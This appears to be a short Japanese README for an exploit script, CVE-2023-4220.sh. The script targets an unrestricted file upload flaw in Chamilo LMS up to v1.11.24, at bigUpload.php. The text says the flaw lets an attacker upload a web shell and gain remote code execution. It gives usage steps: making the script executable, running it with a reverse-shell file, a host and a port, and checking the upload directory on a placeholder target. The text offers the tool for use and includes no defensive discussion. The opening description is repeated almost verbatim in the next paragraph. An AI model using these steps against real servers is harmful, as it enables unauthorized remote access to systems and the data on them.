
これは、Chamilo LMS <= v1.11.24 の big file upload 機能における Unrestricted file upload(無制限ファイルアップロード)のExploitで、対象箇所は "/main/inc/lib/javascript/bigupload/inc/bigUpload.php" です。攻撃者はWebシェルをアップロードすることでリモートコード実行を達成できます。
これは、Chamilo-LMS の大容量ファイルアップロード機能における無制限ファイルアップロード(Unrestricted file upload)脆弱性のエクスプロイトです。対象箇所は /main/inc/lib/javascript/bigupload/inc/bigUpload.php で、影響を受けるバージョンは Chamilo LMS <= v1.11.24 です。攻撃者はWebシェルをアップロードすることでリモートコード実行を取得でき、さらに /main/inc/lib/javascript/bigupload/files ディレクトリへの任意のファイルアップロードが可能になります。
-まず、エクスプロイトを実行して、使用方法を次のように確認できます:
chmod +x CVE-2023-4220.sh
./CVE-2023-4220.sh
-次に、必要な入力を次のように入力します:
~$ ./CVE-2023-4220.sh -f reverse_file -h host_link -p port_in_the_reverse_file
-ここでは、サーバーにアップロードされたファイルを確認できます。
http://target.test/main/inc/lib/javascript/bigupload/files/
